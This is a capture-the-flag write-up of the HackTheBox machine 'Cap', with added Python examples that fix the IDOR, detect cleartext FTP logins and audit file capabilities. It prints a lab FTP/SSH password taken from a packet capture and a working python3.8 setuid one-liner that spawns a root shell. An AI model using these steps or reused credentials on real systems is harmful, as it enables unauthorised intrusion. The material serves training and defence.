TL;DR
This is a walkthrough writeup on Cap, a Linux box rated easy on HackTheBox. The initial foothold came from a parameter-tampering vulnerability in the web app that exposed a packet capture containing FTP credentials; those credentials were also valid for SSH because the password was reused. Privilege escalation was straightforward: the python3.8 binary carried the cap_setuid file capability, which we used to get a root shell.
Cap Writeup: Scanning Network
Running the usual Nmap port scan:
Command used --> nmap -n -Pn -A -sC -sV -v -oN nmap.initial 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Mon, 25 Oct 2021 05:12:02 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Mon, 25 Oct 2021 05:11:56 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Mon, 25 Oct 2021 05:11:56 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: GET, OPTIONS, HEAD
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
| http-methods:
|_ Supported Methods: GET OPTIONS HEAD
|_http-server-header: gunicorn
|_http-title: Security Dashboard
We have:
- port 21: FTP
- port 22: SSH
- port 80: web server
I checked for anonymous FTP login, but it was disabled.
Running a Dirbuster Scan
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
--------------------------------
http://10.10.10.245:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/ip
/netstat
/static/js/vendor/modernizr-2.8.3.min.js
/static/js/popper.min.js
/static/js/bootstrap.min.js
/static/js/metisMenu.min.js
/static/js/owl.carousel.min.js
/static/js/jquery.slimscroll.min.js
/static/js/jquery.slicknav.min.js
/static/js/vendor/jquery-2.2.4.min.js
/static/js/plugins.js
/static/js/pie-chart.js
/static/js/scripts.js
/static/js/line-chart.js
Files found with a 302 responce:
/capture
--------------------------------
Let’s go ahead with the website enumeration.
Website Enumeration
Cap Writeup : Initial Foothold
- I tried to intercept the requests with BurpSuite.
- Initially I thought that for the “ipconfig” & “netstat” pages, the request probably contained the command that was executed on the server, so I could simply replace that command with a reverse shell. But nope, that wasn’t the case.
- However, the “5 Second PCAP & Analysis” feature allowed us to download a PCAP file.
- By default, it allowed us to download /data/1, but when I tampered with this parameter, I found that a /data/0 file also exists, and it seemed to have useful data.
- Any entry after 0 had no data, as seen in the images below:
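The bug above is an insecure direct object reference: the number in /data/N is trusted and the logged-in user is never checked against the capture's owner. The following is an added example, not code from the Cap box or from this writeup, that models that lookup in plain Python: `lookup_capture_vulnerable` reproduces the behaviour seen on the box, and `lookup_capture_safe` ties each capture to the account that created it and answers "missing" and "not yours" identically so the id space cannot be probed. The capture store, account names and file paths are constructed for illustration.

```python
"""
Added example: a model of the /data/<id> capture download with the
insecure and the authorized lookup side by side.  Everything here
(users, ids, paths) is constructed and not taken from the Cap box.
"""
from typing import Dict, NamedTuple, Optional


class Capture(NamedTuple):
    capture_id: int
    owner: str       # account that requested the capture
    path: str        # where the pcap is stored on disk


# Constructed capture store: id 0 belongs to one account, 1 and 2 to another
CAPTURES: Dict[int, Capture] = {
    0: Capture(0, "nathan", "/var/captures/0.pcap"),
    1: Capture(1, "guest", "/var/captures/1.pcap"),
    2: Capture(2, "guest", "/var/captures/2.pcap"),
}


def parse_capture_id(raw: str) -> Optional[int]:
    """Accept only a non-negative decimal integer; anything else is treated as 'not found'."""
    return int(raw) if raw.isdigit() else None


def lookup_capture_vulnerable(raw_id: str, current_user: str) -> Optional[str]:
    """IDOR: the id from the URL is trusted and current_user is never consulted.
    Returns the pcap path to serve, or None for a 404."""
    cid = parse_capture_id(raw_id)
    cap = CAPTURES.get(cid) if cid is not None else None
    return cap.path if cap else None


def lookup_capture_safe(raw_id: str, current_user: str) -> Optional[str]:
    """Authorize the object, not just the request: the capture must belong to current_user.
    'Missing' and 'not yours' both return None so the id space cannot be enumerated."""
    cid = parse_capture_id(raw_id)
    cap = CAPTURES.get(cid) if cid is not None else None
    if cap is None or cap.owner != current_user:
        return None
    return cap.path


def walk_ids(lookup, current_user: str, max_id: int = 5) -> Dict[int, Optional[str]]:
    """What a simple walk over /data/0 .. /data/max_id returns; handy for verifying the fix."""
    return {i: lookup(str(i), current_user) for i in range(max_id + 1)}


if __name__ == "__main__":
    print("vulnerable:", walk_ids(lookup_capture_vulnerable, "guest", 2))
    print("safe:      ", walk_ids(lookup_capture_safe, "guest", 2))
```

With the safe lookup, the `guest` account still gets its own captures 1 and 2 but receives the same 404 for capture 0 as for a capture that does not exist. Using non-sequential, unguessable capture ids on top of this check is a further hardening, but the ownership check is the fix.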
What is a .pcap file?
Packet Capture or PCAP files are data files written by a packet-capture tool (Wireshark, for example) and contain the packets recorded from a network. They are mainly used to analyse the traffic on a given network.
Downloading the /data/0 PCAP file, as it has some data.
Opening & examining that PCAP file with Wireshark: 1.pcap was empty, although 0.pcap had data!
Examining the PCAP file
Opening the pcap file with Wireshark, we could see FTP packets. On following the TCP stream for those FTP packets, we were greeted with the FTP credentials:
FTP Creds
user: nathan
pass: Buck3tH4TF0RM3!
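Following the TCP stream in Wireshark shows the credentials by eye; a defender scanning captures for this kind of exposure wants the same check in code. The block below is an added example, not part of the writeup or of the Cap box: a small libpcap reader written from the file format (24-byte global header, 16-byte record headers, Ethernet/IPv4/TCP), a constructed capture built inline so it runs offline, and a report that names the account that logged in over cleartext FTP and records that a PASS command was seen without copying the password itself. The IP addresses and the password in the sample are constructed; only the username nathan comes from the writeup.

```python
"""
Added example: detect cleartext FTP logins in a libpcap capture.
The capture parser, the frame builder and the sample capture are all
constructed for this example and are not code from the Cap box.
"""
import struct
from typing import Dict, Iterator, List, Tuple

PCAP_MAGIC_LE = 0xA1B2C3D4          # libpcap magic as read little-endian
PCAP_MAGIC_BE = 0xD4C3B2A1          # same bytes written by a big-endian host
LINKTYPE_ETHERNET = 1


def build_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Ethernet + IPv4 + TCP frame with the given payload (checksums left zero; never verified here)."""
    eth = b"\x02" * 6 + b"\x04" * 6 + b"\x08\x00"          # dst MAC, src MAC, EtherType IPv4
    total_len = 20 + 20 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 1, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


def build_pcap(frames: List[bytes]) -> bytes:
    """Wrap frames in a little-endian libpcap file."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_segments(pcap: bytes) -> Iterator[Tuple[str, int, str, int, bytes]]:
    """Yield (src_ip, sport, dst_ip, dport, payload) for every TCP segment in an Ethernet pcap."""
    magic = struct.unpack("<I", pcap[:4])[0]
    end = "<" if magic == PCAP_MAGIC_LE else ">" if magic == PCAP_MAGIC_BE else None
    if end is None:
        raise ValueError("not a libpcap file")
    if struct.unpack(end + "I", pcap[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(end + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                                            # not IPv4
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        ip = ip[:struct.unpack("!H", ip[2:4])[0]]               # drop Ethernet padding
        if ip[9] != 6 or len(ip) < ihl + 20:
            continue                                            # not TCP, or truncated
        src = ".".join(str(b) for b in ip[12:16])
        dst = ".".join(str(b) for b in ip[16:20])
        tcp = ip[ihl:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        doff = (tcp[12] >> 4) * 4
        yield src, sport, dst, dport, tcp[doff:]


def find_cleartext_ftp_logins(pcap: bytes) -> List[Dict[str, object]]:
    """One report per client->server:21 flow that sent USER and/or PASS in the clear."""
    flows: Dict[Tuple[str, int, str, int], Dict[str, object]] = {}
    for src, sport, dst, dport, payload in iter_tcp_segments(pcap):
        if dport != 21 or not payload:
            continue
        rep = flows.setdefault((src, sport, dst, dport),
                               {"client": f"{src}:{sport}", "server": dst,
                                "user": None, "password_seen": False})
        for line in payload.split(b"\r\n"):
            if line[:5].upper() == b"USER ":
                rep["user"] = line[5:].decode("ascii", "replace")
            elif line[:5].upper() == b"PASS ":
                rep["password_seen"] = True        # record the exposure, never the secret itself
    return [r for r in flows.values() if r["user"] or r["password_seen"]]


# Constructed sample capture: an FTP login plus an unrelated HTTP request
SAMPLE_PCAP = build_pcap([
    build_frame("10.0.0.5", "10.0.0.16", 54321, 21, b"USER nathan\r\n"),
    build_frame("10.0.0.16", "10.0.0.5", 21, 54321, b"331 Please specify the password.\r\n"),
    build_frame("10.0.0.5", "10.0.0.16", 54321, 21, b"PASS constructed-example-password\r\n"),
    build_frame("10.0.0.5", "10.0.0.16", 54322, 80, b"GET /ip HTTP/1.0\r\n\r\n"),
])

if __name__ == "__main__":
    for rep in find_cleartext_ftp_logins(SAMPLE_PCAP):
        print(rep)
```

To run it over a real file, pass `open("0.pcap", "rb").read()` to `find_cleartext_ftp_logins`. Only classic libpcap files are handled, not pcapng, and only flows whose destination port is 21 are inspected, so an FTP server on a non-standard port would need the port check widened.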
Cap Writeup: User Flag
Logging in with those FTP creds:
┌─[root@kali]─[~/Desktop/Boxes/HTB/Cap]
└──╼ $ ftp $IP
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/nathan" is the current directory
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 Oct 25 05:03 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for user.txt (33 bytes).
226 Transfer complete.
33 bytes received in 0.00 secs (19.9917 kB/s)
-------------------------------------------------------------------------------------
cat user.txt
cb580***************************
Privilege Escalation
We also tried those FTP creds for SSH, because you never know, and indeed we were able to SSH into the box as user nathan with those creds.
ssh nathan@$IP
- We went ahead and searched for sudo permissions, SUID binaries and capabilities that could escalate our privileges and give us a root shell.
- And as expected from the name of the box, “Cap”, which hints at exploiting capabilities, we found cap_setuid set on the python3.8 binary on the target.
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
Checking GTFOBins for the above capability: python | GTFOBins
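The getcap listing above is exactly what a host audit should be reading. The following added example (not the writeup's or the box's code) turns that listing into findings: it parses both the older `path = caps+flags` layout shown above and the `path caps=flags` layout printed by newer libcap releases, flags root-equivalent capabilities and any file capability granted to a script interpreter, and produces the `setcap -r` command that strips the capability. The set of root-equivalent capabilities and the interpreter name pattern are this example's own choices, not a standard.

```python
"""
Added example: audit `getcap -r` output for dangerous file capabilities.
The GETCAP_OUTPUT sample is the listing from the writeup; the policy
(which capabilities count as root-equivalent, which binaries count as
interpreters) is this example's choice.
"""
import re
from typing import List, NamedTuple, Optional, Set, Tuple

# The `getcap -r / 2>/dev/null` output from the writeup above
GETCAP_OUTPUT = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# Capabilities that on their own let the holder become root or ignore file permissions
# (example policy; extend to taste)
ROOT_EQUIVALENT: Set[str] = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_sys_admin", "cap_sys_module", "cap_sys_ptrace",
}
# Interpreters run whatever code the caller hands them, so a file capability on one
# is effectively granted to every user allowed to execute it
INTERPRETER_RE = re.compile(r"^(python|perl|ruby|php|node|lua)[0-9.]*$")

# 'path = caps+flags' (older libcap, as on the box) or 'path caps=flags' (newer libcap)
LINE_RE = re.compile(r"^(?P<path>\S+)\s+=?\s*(?P<caps>[a-z_,]+)[+=](?P<flags>[eip]+)$")


class Finding(NamedTuple):
    path: str
    caps: Set[str]
    flags: str
    reason: str


def parse_getcap_line(line: str) -> Optional[Tuple[str, Set[str], str]]:
    """Return (path, capability set, flags) or None for lines that are not getcap entries."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("path"), set(m.group("caps").split(",")), m.group("flags")


def audit_getcap(output: str) -> List[Finding]:
    """Flag root-equivalent capabilities anywhere and any capability on an interpreter."""
    findings: List[Finding] = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, caps, flags = parsed
        dangerous = sorted(caps & ROOT_EQUIVALENT)
        interpreter = INTERPRETER_RE.match(path.rsplit("/", 1)[-1]) is not None
        if dangerous:
            reason = "root-equivalent capability " + ",".join(dangerous)
            if interpreter:
                reason += " on an interpreter: anyone who can run it inherits it"
        elif interpreter:
            reason = "file capability on an interpreter"
        else:
            continue
        findings.append(Finding(path, caps, flags, reason))
    return findings


def remediation(finding: Finding) -> str:
    """Strip the file capability; re-add only what the program provably needs afterwards."""
    return "setcap -r " + finding.path


if __name__ == "__main__":
    for f in audit_getcap(GETCAP_OUTPUT):
        print(f"{f.path}: {f.reason}\n    fix: {remediation(f)}")
```

Run against the listing from the box, only /usr/bin/python3.8 is reported: ping, traceroute6 and mtr-packet carry cap_net_raw, and gst-ptp-helper cap_net_bind_service plus cap_net_admin, none of which are on the root-equivalent list and none of which sit on an interpreter. On a live host, feed it `subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout`.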
Root Flag
nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:/root# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
root@cap:~# pwd
/home/nathan
root@cap:~# cd /root
root@cap:/root# ls
root.txt snap
root@cap:/root# cat root.txt
0e13d***************************
That was it for Cap.
Until next time, do check out other informative writeups and blogs here.